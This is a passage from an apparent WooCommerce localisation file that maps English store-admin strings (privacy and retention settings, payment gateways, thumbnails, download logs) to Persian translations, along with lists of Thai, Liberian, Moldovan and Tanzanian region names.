downloadable files.'=>'حذف دسترسی به پرونده‌های قابل دانلود.','Customer download permissions have been retained.'=>'مجوزهای دانلود مشتری حفظ شده است.','Removed payment token "%d"'=>'حذف token پرداختی "%d"','Display name cannot be changed to email address due to privacy concern.'=>'به دلیل نگرانی‌های امنیتی، نام نمایشی را نمی توان به آدرس ایمیل تغییر داد.','Deleted all active sessions, and %d saved carts.'=>'همه sessions فعال حذف کنید، و %d سبدهای ذخیره شده‌اند.','Your store does not appear to be using a secure connection. We highly recommend serving your entire website over an HTTPS connection to help keep customer data secure. Learn more here.'=>'به نظر می رسد فروشگاه شما از یک اتصال امن استفاده نمی کند. ما به شدت توصیه می کنیم در کل وب سایت خود از طریق اتصال HTTPS خدمت کنید تا امنیت اطلاعات مشتری را حفظ شود. بیشتر بدانید.','This tool will delete expired download permissions and permissions with 0 remaining downloads.'=>'این ابزار مجوزها و مجوزهای دانلود شده حذف شده با 0 بارگیری باقی مانده را حذف خواهد کرد.','If the payment was refunded via the API.'=>'اگر پرداخت از طریق API مسترد شد.','Display name'=>'نام نمایشی','Unable to create order.'=>'قادر به ثبت سفارش نیستیم.','Unserializing instances of this class is forbidden.'=>'از حالت سریال خارج کردن نمونه‌های این کلاس ممنوع است.','Cloning is forbidden.'=>'کلونینگ حرام است.','This tool will delete all customer session data from the database, including current carts and saved carts in the database.'=>'این ابزار تمامی داده‌های جلسه مشتری از پایگاه داده را حذف می کند، از جمله سبدهای فعلی و سبدهای ذخیره شده در پایگاه داده.','Limit result set to products with a specific attribute. Use the taxonomy name/attribute slug.'=>'نتیجه محدود برای محصولات با ویژگی خاص تعیین شده است. استفاده از نامک نام دسته/ویژگی.','Blog id of the record on the multisite.'=>'شناسه بخطا گزارش در چندسایته.','WooCommerce pages'=>'برگه‌های ووکامرس','WooCommerce database version'=>'نسخه پایگاه داده ووکامرس','Settings tab labelPayments'=>'پرداخت‌ها','Manage'=>'مدیریت','Legacy API'=>'API منسوخ','Secure checkout'=>'پرداخت امن','Account endpoints'=>'نقطه فرود حساب کاربری','WooCommerce version'=>'نسخه ووکامرس','WordPress version'=>'نسخه وردپرس','WordPress multisite'=>'وردپرس چندسایته','WordPress memory limit'=>'محدودیت حافظه وردپرس','WordPress debug mode'=>'حالت رفع عیب ووکامرس','WordPress cron'=>'زمانبندی ووکامرس','Retain completed orders'=>'حفظ سفارشات کامل شده','%1$s - There is a newer version of WordPress available (%2$s)'=>'%1$s - اینجا نسخه جدیدتری از وردپرس در دسترس است (%2$s)','Displays whether or not WordPress is using an external object cache.'=>'نمایش داده می شود که یا وردپرس یک کش مخزن خارجی را استفاده می کند.','Rates will be configurable and taxes will be calculated during checkout.'=>'نرخ‌ها قابل تنظیم خواهد بود و مالیات در زمان پرداخت محاسبه خواهد شد.','Enable tax rates and calculations'=>'فعال کردن نرخ مالیات و محاسبه آن','Failed orders are unpaid and may have been abandoned by the customer. They will be trashed after the specified duration.'=>'سفارشات خراب پرداخت نشده اند و ممکن است توسط مشتری رها شوند. آنها بعد از مدت مشخص حذف می شوند.','Pending orders are unpaid and may have been abandoned by the customer. They will be trashed after the specified duration.'=>'سفارشات معلق پرداخت نشده اند و ممکن است توسط مشتری رها شوند. آنها بعد از مدت مشخص حذف می شوند.','Cancelled orders are unpaid and may have been cancelled by the store owner or customer. They will be trashed after the specified duration.'=>'سفارش‌های لغو شده پرداخت نشده اند و ممکن است توسط صاحب فروشگاه یا مشتری لغو شود. آنها بعد از مدت مشخص حذف می شوند.','Retain completed orders for a specified duration before anonymizing the personal data within them.'=>'قبل از شناسایی اطلاعات شخصی درون آنها، دستورات تکمیل شده را برای مدت زمان مشخصی حفظ کنید.','External object cache'=>'کش کالا خارجی','Enable coupons'=>'فعالسازی کدهای تخفیف','Retain failed orders'=>'حفظ سفارش‌های ناموفق','Retain cancelled orders'=>'نگه داشتن سفارش‌های ناموفق','Use previous column mapping preferences?'=>'از ترجیحات نقشه ستون قبلی استفاده کنید؟','Remove personal data'=>'حذف داده شخصی','Filter by registered customer'=>'فیلتر براساس مشتری‌های ثبت‌نام شده','Privacy policy'=>'سیاست حفظ حریم خصوصی','privacy page'=>'برگه حفظ حریم خصوصی','Allowed emails'=>'ایمیل‌های مجاز','Account erasure requests'=>'درخواست حذف حساب','Registration privacy policy'=>'سیاست حفظ حریم خصوصی ثبت نام','Checkout privacy policy'=>'سیاست حفظ حریم خصوصی پرداخت','Personal data retention'=>'حفظ اطلاعات شخصی','Your personal data will be used to support your experience throughout this website, to manage access to your account, and for other purposes described in our %s.'=>'اطلاعات شخصی شما برای پردازش سفارش شما استفاده می‌شود، و پشتیبانی از تجربه شما در این وبسایت، و برای اهداف دیگری که در %s توضیح داده شده است.','Choose how long to retain personal data when it\'s no longer needed for processing. Leave the following options blank to retain this data indefinitely.'=>'زمانی که دیگر برای پردازش مورد نیاز نیست، اطلاعات شخصی خود را انتخاب کنید. گزینه‌های زیر را خالی بگذارید تا این اطلاعات را به صورت نامحدود حفظ کنید.','Optionally add some text about your store privacy policy to show during checkout.'=>'در صورت تمایل یک متن در مورد سیاست حفظ حریم خصوصی فروشگاه خود برای نمایش در هنگام پرداخت اضافه کنید.','Optionally add some text about your store privacy policy to show on account registration forms.'=>'در صورت تمایل یک متن در مورد سیاست حفظ حریم خصوصی فروشگاه خود برای نمایش فرم ثبت نام حساب اضافه کنید.','Inactive accounts are those which have not logged in, or placed an order, for the specified duration. They will be deleted. Any orders will be converted into guest orders.'=>'حساب‌های غیر فعال کسانی هستند که برای مدت زمان مشخص وارد نشده اند و یا سفارش نداشته اند. آنها حذف خواهند شد. هر سفارش به سفارش مهمان تبدیل خواهد شد.','This section controls the display of your website privacy policy. The privacy notices below will not show up unless a %s is set.'=>'این بخش صفحه نمایش سیاست حفظ حریم خصوصی وب سایت شما را کنترل می کند. اعلامیه‌های حفظ حریم خصوصی در زیر نشان داده نخواهد شد مگر اینکه یک %s تنظیم شود.','List of allowed billing emails to check against when an order is placed. Separate email addresses with commas. You can also use an asterisk (*) to match parts of an email. For example "*@gmail.com" would match all gmail addresses.'=>'لیست سفید از ایمیل‌های صورتحساب برای بررسی در زمانی که یک سفارش ثبت می شود. آدرس های ایمیل را با کاما جدا کنید. شما همچنین می توانید از ستاره (*) برای مطابقت با بخشی از ایمیل استفاده کنید. به عنوان مثال "*@gmail.com" تمام آدرس‌های جیمیل را مطابقت می دهد.','Your personal data will be used to process your order, support your experience throughout this website, and for other purposes described in our %s.'=>'اطلاعات شخصی شما برای پردازش سفارش شما، پشتیبانی از تجربه شما در سراسر این وب سایت و برای اهدافی که در %s ذکر شده است استفاده می شود.','Retain pending orders '=>'حفظ سفارشات در انتظار ','Retain inactive accounts '=>'حساب‌های غیر فعال را حفظ کنید ','Removed personal data from %s order.'=>'حذف داده‌های شخصی از %s سفارش.','Accounts & Privacy'=>'حساب‌های کاربری و حریم خصوصی','Visit Dashboard'=>'مشاهده داشبورد','Storefront icon'=>'آیکون Storefront','automated taxes icon'=>'آیکون مالیات خودکار','Continue with WooCommerce Services'=>'با سرویس‌های ووکامرس ادامه دهید','Create some products'=>'تعدادی محصول ایجاد کنید','You can also:'=>'همچنین می توانید:','Review Settings'=>'تنظیمات نقدوبررسی','View & Customize'=>'شخصی سازی مشاهده','Connect your store to activate WooCommerce Services'=>'فروشگاه خود را متصل کنید برای فعال شدن سرویس‌های ووکامرس','You\'re ready to add products to your store.'=>'شما برای افزودن محصولات به فروشگاه آماده اید.','Save time and errors with automated tax calculation and collection at checkout. Powered by WooCommerce Services and Jetpack.'=>'صرفه جویی در زمان و خطاهای با محاسبه مالیات خودکار و جمع آوری در پرداخت Powered by WooCommerce Services and Jetpack.','Thanks for using Jetpack! Your store is almost ready: to activate services like %s, just connect your store.'=>'با تشکر برای استفاده از Jetpack! فروشگاه شما تقریبا آماده است: برای فعال کردن خدمات مانند %s، فقط فروشگاه خود را متصل کنید.','Mailchimp for WooCommerce'=>'Mailchimp برای ووکامرس','Mailchimp icon'=>'آیکون Mailchimp','Join the 16 million customers who use Mailchimp. Sync list and store data to send automated emails, and targeted campaigns.'=>'به جمعه 16 میلیون کاربر Mailchimp بپیوندید.همگام‌سازی لیست و نگهداری داده برای ارسال ایمیل خودکار، و کمپین‌های هدفمند.','Mailchimp'=>'Mailchimp','Design your store with deep WooCommerce integration. If toggled on, we’ll install Storefront, and your current theme %s will be deactivated.'=>'فروشگاه خود را با ووکامرس ادغام کنید. ما نصب میکنیم Storefront را برای شما و قالب شما %s غیر فعال می شود.','Enhance your store with these recommended free features.'=>'با استفاده از این ویژگی‌های رایگان توصیه شده، فروشگاه خود را ارتقا دهید.','Recommended for All WooCommerce Stores'=>'توصیه شده برای تمام فروشگاه‌های ووکامرس','The PayFast extension for WooCommerce enables you to accept payments by Credit Card and EFT via one of South Africa’s most popular payment gateways. No setup fees or monthly subscription costs.'=>'افزودنی PayFast برای ووکامرس پرداخت‌های کارت اعتباری و EFT را برای شما فعال می کند از طریق درگاه پرداخت معتبر کشور آ،ریقای جنوبی. هیچ هزینه راه اندازی پرداخت نمی کنید.','WooCommerce Square'=>'میدان ووکامرس','WooCommerce Stripe Gateway'=>'درگاه Stripe ووکامرس','Klarna Checkout for WooCommerce'=>'صورتحساب Klarna برای ووکامرس','Klarna Payments for WooCommerce'=>'پرداخت‌های Klarna برای ووکامرس','WooCommerce eWAY Gateway'=>'درگاه eWAY ووکامرس','WooCommerce PayFast Gateway'=>'درگاه PayFast ووکامرس','The following plugins will be installed and activated for you:'=>'افزونه‌های زیر برای شما نصب و فعال می شود:','The eWAY extension for WooCommerce allows you to take credit card payments directly on your store without redirecting your customers to a third party site to make payment.'=>'افزودنی eWAY ووکامرس به شما امکان پرداخت مستقیم از طریق کارت اعتباری بدون نیاز به سایت‌های واسط می کند.','Chattogram'=>'Chattogram','Jashore'=>'Jashore','Bomi'=>'Bomi','Bong'=>'Bong','Gbarpolu'=>'Gbarpolu','Grand Bassa'=>'Grand Bassa','Grand Cape Mount'=>'Grand Cape Mount','Grand Gedeh'=>'Grand Gedeh','Grand Kru'=>'Grand Kru','Margibi'=>'Margibi','Montserrado'=>'Montserrado','Nimba'=>'Nimba','Rivercess'=>'Rivercess','River Gee'=>'River Gee','Sinoe'=>'Sinoe','Amnat Charoen'=>'Amnat Charoen','Ang Thong'=>'Ang Thong','Ayutthaya'=>'Ayutthaya','Bangkok'=>'Bangkok','Bueng Kan'=>'Bueng Kan','Buri Ram'=>'Buri Ram','Chachoengsao'=>'Chachoengsao','Chai Nat'=>'Chai Nat','Chaiyaphum'=>'Chaiyaphum','Chanthaburi'=>'Chanthaburi','Chiang Mai'=>'Chiang Mai','Chiang Rai'=>'Chiang Rai','Chonburi'=>'Chonburi','Chumphon'=>'Chumphon','Kalasin'=>'Kalasin','Kamphaeng Phet'=>'Kamphaeng Phet','Kanchanaburi'=>'Kanchanaburi','Khon Kaen'=>'Khon Kaen','Krabi'=>'Krabi','Lampang'=>'Lampang','Lamphun'=>'Lamphun','Loei'=>'Loei','Lopburi'=>'Lopburi','Mae Hong Son'=>'Mae Hong Son','Maha Sarakham'=>'Maha Sarakham','Mukdahan'=>'Mukdahan','Nakhon Nayok'=>'Nakhon Nayok','Nakhon Pathom'=>'Nakhon Pathom','Nakhon Phanom'=>'Nakhon Phanom','Nakhon Ratchasima'=>'Nakhon Ratchasima','Nakhon Sawan'=>'Nakhon Sawan','Nakhon Si Thammarat'=>'Nakhon Si Thammarat','Nan'=>'Nan','Narathiwat'=>'Narathiwat','Nong Bua Lam Phu'=>'Nong Bua Lam Phu','Nong Khai'=>'Nong Khai','Nonthaburi'=>'Nonthaburi','Pathum Thani'=>'Pathum Thani','Pattani'=>'Pattani','Phang Nga'=>'Phang Nga','Phatthalung'=>'Phatthalung','Phayao'=>'Phayao','Phetchabun'=>'Phetchabun','Phetchaburi'=>'Phetchaburi','Phichit'=>'Phichit','Phitsanulok'=>'Phitsanulok','Phrae'=>'Phrae','Phuket'=>'Phuket','Prachin Buri'=>'Prachin Buri','Prachuap Khiri Khan'=>'Prachuap Khiri Khan','Ranong'=>'Ranong','Ratchaburi'=>'Ratchaburi','Rayong'=>'Rayong','Roi Et'=>'Roi Et','Sa Kaeo'=>'Sa Kaeo','Sakon Nakhon'=>'Sakon Nakhon','Samut Prakan'=>'Samut Prakan','Samut Sakhon'=>'Samut Sakhon','Samut Songkhram'=>'Samut Songkhram','Saraburi'=>'Saraburi','Satun'=>'Satun','Sing Buri'=>'Sing Buri','Sisaket'=>'Sisaket','Songkhla'=>'Songkhla','Sukhothai'=>'Sukhothai','Suphan Buri'=>'Suphan Buri','Surat Thani'=>'Surat Thani','Surin'=>'Surin','Tak'=>'Tak','Trang'=>'Trang','Trat'=>'Trat','Ubon Ratchathani'=>'Ubon Ratchathani','Udon Thani'=>'Udon Thani','Uthai Thani'=>'Uthai Thani','Uttaradit'=>'Uttaradit','Yala'=>'Yala','Yasothon'=>'Yasothon','No keys found.'=>'کلیدی یافت نشد.','REST API'=>'REST API','You do not have permission to edit API Keys'=>'شما اجازه ویرایش کلیدهای API را ندارید','WooCommerce Network Orders'=>'سفارشات شبکه ووکامرس','Loading network orders'=>'بارگذاری سفارشات شبکه','You don’t have permission to do this.'=>'برای انجام این کار دسترسی ندارید.','Recommended'=>'توصیه شده','What currency do you accept payments in?'=>'چه واحد پولی برای پرداخت قبول می کنید؟','Lofa'=>'Lofa','Return to payments'=>'بازگشت به پرداخت‌ها','%1$s (%2$s %3$s)'=>'%1$s (%2$s %3$s)','Help WooCommerce improve with usage tracking'=>'برای بهبود ووکامرس با استفاده از رهگیری استفاده کمک کنید','Choose a state…'=>'انتخاب یک ایالت;','Year(s)'=>'سال(ها)','Month(s)'=>'ماه(ها)','Week(s)'=>'هفته(ها)','Day(s)'=>'روز(ها)','Insufficient privileges to import products.'=>'دسترسی‌های محدود برای درون‌ریزی محصولات.','Insufficient privileges to export products.'=>'دسترسی‌های محدود برای برون‌بری محصولات.','Profile →'=>'پروفایل ←','Image size used for products in the catalog.'=>'اندازه تصویر استفاده شده در کاتالوگ.','After publishing your changes, new image sizes may not be shown until you regenerate thumbnails. You can do this from the tools section in WooCommerce or by using a plugin such as Regenerate Thumbnails.'=>'پس از انتشار تغییرات خود، ممکن است اندازه تصویر جدید تا زمانی که تصاویر بندانگشتی بازسازی نشود، نشان داده نشود.می توانید انجام دهید ازبخش ابزار در ووکامرسیا استفاده از افزونه ای مانندRegenerate Thumbnails.','After publishing your changes, new image sizes may not be shown until you Regenerate Thumbnails.'=>'پس از انتشار تغییرات خود، ممکن است اندازه‌های جدید تصویر به شما نشان داده نشود تا شما ازRegenerate Thumbnailsاستفاده کنید.','Deleting a category does not delete the products in that category. Instead, products that were only assigned to the deleted category are set to the category %s.'=>'پاک کردن یک دسته، محصولات موجود در آن دسته را پاک نمی‌کند. به‌جای آن، محصولاتی که تنها مربوط به دسته‌ی پاک‌شده هستند، به دسته‌ی %s منتقل می‌شوند.','Make “%s” the default category'=>'ایجاد “%s” دسته پیشفرض','This is the default category and it cannot be deleted. It will be automatically assigned to products with no category.'=>'این دسته پیشفرض است و نمی تواند حذف شود. می تواند خودکار به محصولات بدون دسته اختصاص یابد.','Edit this order'=>'ویرایش این سفارش','Change order status to on-hold'=>'تغییر وضعیت سفارش به درانتظار','Change order status to processing'=>'تغییر وضعیت سفارش به پردازش','Change order status to completed'=>'تغییر وضعیت سفارش به کامل شده','Cancel thumbnail regeneration'=>'کنسل کردن ایجاد مجدد بندانگشتی','Thumbnail regeneration is running in the background. Depending on the amount of images in your store this may take a while.'=>'بازسازی تصویر بند انگشتی در پس زمینه اجرا می شود. بسته به مقدار تصاویر موجود در فروشگاه شما ممکن است کمی طول بکشد.','Regenerate shop thumbnails'=>'ایجاد مجدد بندانگشتی فروشگاه','Regenerate'=>'بازسازی','This will regenerate all shop thumbnails to match your theme and/or image settings.'=>'این همه تصاویر بندانگشتی را بازسازی می کند تا با قالب و تنظیمات تصویر شما سازگار باشد.','Thumbnail regeneration has been scheduled to run in the background.'=>'بازسازی تصویر بند انگشتی برنامه ریزی شده است که در پس زمینه اجرا شود.','Cancelled product image regeneration job.'=>'بازسازی تصویر محصول را لغو شد.','After publishing your changes, new image sizes will be generated automatically.'=>'پس از انتشار تغییرات خود، اندازه تصاویر جدید به طور خودکار تولید می شود.','Pay for this order'=>'پرداخت برای این سفارش','%s quantity'=>'%s عدد','Uncropped'=>'باز نشده','1:1'=>'1:1','Thumbnail width'=>'عرض تصویر بند انگشتی','Product Images'=>'تصاویر محصول','Product Catalog'=>'کاتالوگ محصول','Enable store notice'=>'اطلاعیه فروشگاه را فعال کنید','If enabled, this text will be shown site-wide. You can use it to show events or promotions to visitors!'=>'اگر فعال شود، این متن در سراسر سایت نمایش داده خواهد شد. شما می توانید از آن برای نشان دادن رویدادها یا تبلیغات به بازدیدکنندگان استفاده کنید!','Store Notice'=>'اطلاعیه فروشگاه','Buy “%s”'=>'خرید “%s”','Category display'=>'نمایش دسته','Products per row'=>'محصولات در هر ردیف','Sandbox API signature'=>'امضای API جعبه شنی','Sandbox API password'=>'رمزعبور API جعبه شنی','Sandbox API username'=>'نام‌کاربری API جعبه شنی','Live API signature'=>'امضای API زنده','Live API password'=>'رمزعبور API زنده','Live API username'=>'نام‌کاربری API زنده','Invalid download log: not found.'=>'گزارش دانلود نامعتبر: یافت نشد.','Invalid download log: no ID.'=>'گزارش دانلود نامعتبر: بدون شناسه.','Choose what to display on the main shop page.'=>'انتخاب کنید در برگه اصلی فروشگاه چه مواردی نمایش داده شود.','Choose what to display on product category pages.'=>'انتخاب کنید در صفحه دسته‌بندی محصولات چه مواردی نمایش داده شود.','How many products should be shown per row?'=>'در هر ردیف چند محصول نمایش داده شود؟','How many rows of products should be shown per page?'=>'در هر صفحه چند ردیف از محصولات نمایش داده شود؟','Main image width'=>'عرض تصویر اصلی','Image size used for the main image on single product pages. These images will remain uncropped.'=>'سایز تصویر برای تصویر اصلی که در صفحه محصولات تکی نمایش داده می‌شود. این تصاویر بریده نخواهند شد.','Thumbnail cropping'=>'برش خودکار تصاویر بندانگشتی (cropping)','Images will be cropped to a custom aspect ratio'=>'تصاویر به ابعاد دلخواه بریده شود','How should products be sorted in the catalog by default?'=>'محصولات به صورت پیشفرض به چه ترتیبی نمایش داده شوند؟','Select options for “%s”'=>'انتخاب گزینه‌ها برای “%s”','Unable to insert download log entry in database.'=>'امکان وارد کردن گزارش دانلود در پایگاه داده وجود ندارد.','Enable IPN email notifications'=>'فعالسازی اعلانات IPN ایمیل','Completed product image regeneration job.'=>'عملیات بازسازی عکس محصول کامل شده است.','Regenerating images for attachment ID: %s'=>'بازسازی تصاویر برای شناسه پیوست: %s','IPN email notifications'=>'اعلانات IPN از طریق ایمیل','Default category slugUncategorized'=>'دسته-بندی-نشده','Rows per page'=>'ردیف‌ها در هر برگه','Send notifications when an IPN is received from PayPal indicating refunds, chargebacks and cancellations.'=>'ارسال اعلان هنگامی که IPN از پی پال بازپرداخت را نشان می دهد،شارژ مجدد و کنسل کردن.','Invalid webhook.'=>'وب هوک نامعتبر.','Images will display using the aspect ratio in which they were uploaded'=>'تصاویر به شکل همان ابعادی که آپلود شده‌اند نمایش داده شوند','Images will be cropped into a square'=>'تصاویر به صورت مربعی بریده میشوند','The maximum allowed setting is %d'=>'بیشترین تنظیم مجاز %d است','The minimum allowed setting is %d'=>'کمترین تنظیم مجاز %d است','View products in the “%s” group'=>'مشاهده محصولات در گروه “%s&rdquo','On backorder'=>'در پیش‌خرید','Paid on %1$s @ %2$s'=>'پرداخت در %1$s @ %2$s','Date created:'=>'تاریخ ایجاد:','Status:'=>'وضعیت:','Copy link'=>'کپی پیوند','View report'=>'مشاهده گزارش','File ID'=>'شناسه پرونده','Permission ID'=>'شناسه مجوز','Filter by product'=>'فیلتر براساس محصول','Filter by file'=>'فیلتر براساس پرونده','Filter by order'=>'فیلتر براساس سفارش','Filter by user'=>'فیلتر براساس کاربر','Filter by IP address'=>'فیلتر براساس IP','Shop pages'=>'برگه‌های فروشگاه','Customer download log'=>'گزارش دانلود مشتری','Set Status - On backorder'=>'تغییر وضعیت - در پیش‌خرید','Confirm navigation'=>'تایید ناوبری','Permission #%d not found.'=>'مجوز #%d یافت نشد.','No customer downloads found.'=>'دانلودی برای مشتری یافت نشد.','Error processing refund. Please try again.'=>'خطا در پردازش بازپرداخت.مجدد تلاش کنید.','Municipality / District'=>'منطقه / ناحیه','Invalid permission ID.'=>'شناسه مجوز نامعتبر است.','Copying to clipboard failed. You should be able to right-click the button and copy.'=>'کپی در کلیپبورد شکست خورد. شما یاید با کلیک راست و دکمه کپی کنید.','Limit result set to products with specific SKU(s). Use commas to separate.'=>'نتیجه محدود شده به محصولات با SKU(s) تعریف شده. برای جداسازی از کاما استفاده کنید.','Search logs'=>'جستجوی گزارش‌ها','This report link has expired. %1$sClick here to view the filtered report%2$s.'=>'این گزارش پیوند منقضی شده است. %1$s برای مشاهده فیلتر گزارش‌ها کلیک کنید%2$s.','%s is not a valid postcode / ZIP.'=>'%s یک کدپستی معتبر نمی‌باشد. کد پستی را با اعداد انگلیسی و بدون فاصله وارد نمایید.','Filter by stock status'=>'فیلتر بر اساس وضعیت موجودی','Download ID.'=>'شناسه دانلود.','Postcodes containing wildcards (e.g. CB23*) or fully numeric ranges (e.g. 90210...99000) are also supported. Please see the shipping zones documentation for more information.'=>'کدهای پستی حاوی حروف عام (مانند CB23*) یا محدوده‌های کاملاً عددی (مانند 90210...99000) نیز پشتیبانی می‌شوند. لطفا برای اطلاعات بیشتر به اسناد مناطق حمل و نقل مراجعه کنید.','%s = human-readable time difference%s ago'=>'%s قبل','Payment via'=>'پرداخت از طریق','On-hold'=>'در انتظار بررسی','Completed'=>'تکمیل شده','Change status: '=>'تغییر وضعیت: ','Change status to processing'=>'تغییر وضعیت به پردازش','Change status to on-hold'=>'تغییر وضعیت به درانتظار','Existing products that match by ID or SKU will be updated. Products that do not exist will be skipped.'=>'محصولات موجود که با شناسه یا SKU مطابقت دارند، به روز می شوند. محصولاتی که وجود ندارد از بین خواهد رفت.','To receive updates and support for this extension, you need to purchase a new subscription or consolidate your extensions to one connected account by sharing or transferring this extension to this connected account.'=>'برای دریافت پشتیبانی و بروزرسانی اضافات، باید پرداخت کنید یک اضافه رو که به حساب وصل شود توسط اشتراکیاترانسفراین اضافه به اکانت وصل شده.','M j, Y'=>'j M، Y','Change status to completed'=>'تغییر وضعیت به تکمیل شده','Create your first coupon'=>'ایجاد اولین کدتخفیف','The WooCommerce Helper plugin is no longer needed. Manage subscriptions from the extensions tab instead.'=>'به افزونه همیار ووکامرس نیازی نیست. بجای آن از زبانه اضافاتاشتراک‌ها را مدیریت کنید.','Continue with Jetpack'=>'ادامه با Jetpack','payment setup and automated taxes'=>'تنظیم اندازی پرداخت و مالیت خودکار','Delete "%s" permanently'=>'حذف "%s" دائمی','payment setup'=>'تنظیم پرداخت','Webhook topic unknown. Please select a valid topic.'=>'موضوع ناشناس Webhook. لطفا موضوع معتبر انتخاب کنید.','Reasons you\'ll love Jetpack'=>'دلایل خوبی که شما جت پک را دوست خواهید داشت','Square'=>'مربع','Choose the payment that you want, pay now, pay later or slice it. No credit card numbers, no passwords, no worries. Learn more about Klarna.'=>'انتخاب روش پرداختی که می خواهید pay now, pay later or slice it. بدون نیاز به شماره کارت،رمزعبور،بدون نگرانی. اطلاعات بیشتر درباره Klarna.','Direct payments to email address:'=>'پرداخت مستقیم به ایمیل:','Email address to receive payments'=>'ایمیل برای دریافت پرداخت‌ها','Klarna Checkout'=>'پرداخت Klarna','Klarna Payments'=>'پرداخت‌های Klarna','Securely accept credit and debit cards with one low rate, no surprise fees (custom rates available). Sell online and in store and track sales and inventory in one place. Learn more about Square.'=>'کارت‌های اعتباری و بدهی را با یک نرخ کم، هیچ هزینه اضافی (نرخ‌‌های سفارشی در دسترس).فروش آنلاین و در فروشگاه و پیگیری فروش و موجودی در یک مکان.بیشتر بخوانید.','Revision restored.'=>'بازبینی بازگردانی شد.','Customer downloads'=>'دانلودهای مشتری','I will also be selling products or services in person.'=>'من همچنین محصولات و خدمات را به صورت شخصی می فروشم.','Full checkout experience with pay now, pay later and slice it. No credit card numbers, no passwords, no worries. Learn more about Klarna.'=>'تجربه پرداخت کامل با pay now, pay later and slice it.بدون نیاز به شماره کارت،رمزعبور و هیچگونه نگرانی.اطلاعات بیشتر درباره Klarna.','Accept debit and credit cards in 135+ currencies, methods such as Alipay, and one-touch checkout with Apple Pay. Learn more.'=>'پذیرش کارت اعتباری در +135 واحد پولی،روش‌هایی مانند Alipay،و پررداخت one-touch با Apple Pay.اطلاعات بیشتر.','If you like, you may enter custom structures for your product URLs here. For example, using shop would make your product links like %sshop/sample-product/. This setting affects product URLs only, not things such as product categories.'=>'اگر دوست دارید می‌توانید ساختاری دلخواه برای آدرس محصول بسازید. برای مثال، استفاده از shop لینک محصول شما را به شکل %sshop/sample-product/ تغییر می‌دهد. این تنظیم تنها روی نشانی محصول تاثیر می‌گذارد و روی چیزهای دیگر مانند دسته محصولات تاثیری ندارد.','Criuleni'=>'Criuleni','Drochia'=>'Drochia','Glodeni'=>'Glodeni','Ialoveni'=>'Ialoveni','Leova'=>'Leova','Nisporeni'=>'Nisporeni','Orhei'=>'Orhei','Rezina'=>'Rezina','Soroca'=>'Soroca','Taraclia'=>'Taraclia','Ungheni'=>'Ungheni','Arusha'=>'Arusha','Dar es Salaam'=>'Dar es Salaam','Dodoma'=>'Dodoma','Iringa'=>'Iringa','Kagera'=>'Kagera','Pemba North'=>'Pemba North','Zanzibar North'=>'Zanzibar North','Kigoma'=>'Kigoma','Kilimanjaro'=>'Kilimanjaro','Pemba South'=>'Pemba South','Zanzibar South'=>'Zanzibar South','Lindi'=>'Lindi','Mara'=>'Mara','Mbeya'=>'Mbeya','Zanzibar West'=>'Zanzibar West','Morogoro'=>'Morogoro','Mtwara'=>'Mtwara','Mwanza'=>'Mwanza','Coast'=>'Coast','Rukwa'=>'Rukwa','Ruvuma'=>'Ruvuma','Shinyanga'=>'Shinyanga','Singida'=>'Singida','Tabora'=>'Tabora','Tanga'=>'Tanga','Manyara'=>'Manyara','Geita'=>'Geita','Katavi'=>'Katavi','Njombe'=>'Njombe','Simiyu'=>'Simiyu','Read more about “%s”'=>'بیشتر بخوانید درباره “%s”','This product has produced sales and may be linked to existing orders. Are you sure you want to delete it?'=>'این محصول فروش را تولید کرده است و ممکن است به سفارش‌هایی لینک شده باشد. آیا از حذف آن اطمینان دارید؟','Determines how this attribute\'s values are displayed.'=>'تعریف کنید چگونه می خواهید این ویژگی نمایش داده شود.','Attributes let you define extra product data, such as size or color. You can use these attributes in the shop sidebar using the "layered nav" widgets.'=>'ویژگی‌ها به شما اجازه می دهد توضیحات بیشتری درباره محصول مانند رنگ یا اندازه دهید. می توانید با استفاده از این ویژگی در سایدبار فروشگاه استفاده کنید با ابزارک "layered nav".','Move “%s” to the Trash'=>'انتقال “%s” به زباله‌دان','Anenii Noi'=>'Anenii Noi','Basarabeasca'=>'Basarabeasca','Briceni'=>'Briceni','Cahul'=>'Cahul','Cantemir'=>'Cantemir','New payment methods can only be added during checkout. Please contact us if you require assistance.'=>'روش پرداخت جدید تنها می تواند هنگام پرداخت اضافه شود. لطفا اگر نیاز به راهنمایی دارید با ما تماس بگیرید.','Belarusian ruble (old)'=>'Belarusian ruble (old)','Define if the variation is visible on the product\'s page.'=>'در صورتی که متغیر در صفحه محصول قابل نمایان می باشد، تعیین کنید.','This key is invalid or has already been used. Please reset your password again if needed.'=>'این کلید نامعتبراست یا در حال حاضر استفاده شده است. لطفا در صورت نیاز، کلمه عبور خود را مجددا تنظیم نمایید.','End date of sale price, as GMT.'=>'تاریخ پایان قیمت ویژه، بر اساس زمان GMT.','Order updated and sent.'=>'سفارش بروزرسانی و ارسال شد.','Resend new order notification'=>'ارسال مجدد اطلاع سفارش جدید','Recent Product Reviews'=>'نقدهای محصول اخیر','Display a list of recent reviews from your store.'=>'نمایش لیست نقدهای اخیر از فروشگاه شما.','Filter Products by Rating'=>'فیلتر محصولات براساس امتیاز','Product Tag Cloud'=>'ابرچسب محصول','A cloud of your most used product tags.'=>'ابری از بیشترین برچسب‌های استفاده شده محصول.','Product Search'=>'جستجوی محصول','A search form for your store.'=>'فرم جستجو برای فروشگاه.','Maximum depth'=>'بیشترین عمق','Filter Products by Price'=>'فیلتر محصولات براساس قیمت','Display a list of star ratings to filter products in your store.'=>'نمایش یک لیست از ارزیابی‌های ستاره ای جهت فیلتر کردن محصولات در فروشگاه شما.','There are no shipping options available. Please ensure that your address has been entered correctly, or contact us if you need any help.'=>'هیچ گزینه ای ارسال در دسترس نیست. لطفا اطمینان حاصل کنید که نشانی شما به درستی وارد شده است، یا اگر به کمک نیاز دارید با ما تماس بگیرید.','Filter Products by Attribute'=>'فیلتر کردن محصولات بر اساس صفت','Active Product Filters'=>'فیلترهای فعال محصول','Relevance'=>'ارتباط','Please, provide an attribute name.'=>'لطفا، یک نام صفت ارائه نمائید.','Display the customer shopping cart.'=>'نمایش سبد خرید مشتری.','Display a list of attributes to filter products in your store.'=>'نمایش یک لیست از صفات جهت فیلتر کردن محصولات در فروشگاه شما.','Display a slider to filter products in your store by price.'=>'نمایش یک اسلایدر جهت فیلتر کردن محصولات بر اساس قیمت در فروشگاه شما.','Please enter a valid email address'=>'لطفا یک آدرس ایمیل معتبر وارد نمائید','Invalid payment gateway.'=>'درگاه پرداخت نامعتبر.','Payment method successfully added.'=>'روش پرداخت باموفقیت اضافه شد.','Unable to add payment method to your account.'=>'عدم توانایی جهت افزودن روش پرداخت به حساب کاربری شما.','Fee has already been 